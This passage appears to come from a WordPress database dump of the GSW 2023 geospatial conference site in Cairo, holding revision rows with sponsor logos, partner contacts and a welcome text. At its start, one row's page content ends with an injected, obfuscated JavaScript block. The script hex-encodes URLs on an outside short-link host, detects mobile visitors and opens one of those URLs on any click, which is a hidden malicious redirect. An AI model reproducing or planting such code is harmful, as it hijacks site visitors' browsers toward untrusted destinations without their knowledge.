<a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:29:02','2023-08-15 23:29:02','',3066,'https://gsw2023.com/?p=5223',0,'revision','',0),
(5224,1,'2023-08-15 23:31:18','2023-08-15 23:31:18','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read 